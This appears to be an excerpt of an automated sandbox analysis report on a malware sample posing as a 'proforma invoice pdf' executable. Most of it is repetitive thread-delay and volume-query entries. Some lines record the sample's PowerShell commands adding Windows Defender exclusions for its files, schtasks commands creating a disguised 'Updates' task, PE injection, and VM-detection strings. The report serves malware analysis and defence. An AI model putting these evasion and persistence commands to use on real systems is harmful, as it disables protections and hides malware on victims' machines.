Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593962
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593539
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593313
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199873
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199653
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199545
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199269
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199075
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1198664
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1198438
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599855
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599530
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599309
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598756
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598391
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598172
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597266
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596826
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596717
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596497
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596170
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596058
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595946
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595828
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595718
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595494
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594225
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594086
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593906
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199766
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199641
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599859
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598661
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598310
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597761
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597653
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597466
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597339
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595850
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595733
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595514
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595407
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595282
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595157
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595032
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594916
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594456
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593938
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593805
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593703
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593589
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593485
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593360
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593235
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593110

Source: bmBOz.exe, 00000016.00000002.1724184220.00000000071EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wTyVrj.exe, 00000010.00000002.3904784587.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3904846398.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3905207280.0000000000C51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: proforma invoice pdf.exe, 0000000A.00000002.3908344983.0000000001235000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory written: C:\Users\user\Desktop\proforma invoice pdf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory written: C:\Users\user\AppData\Roaming\wTyVrj.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory written: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp"
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp6D52.tmp"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp889B.tmp"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"

Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: program manager
Source: proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: program managerTH

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Users\user\Desktop\proforma invoice pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
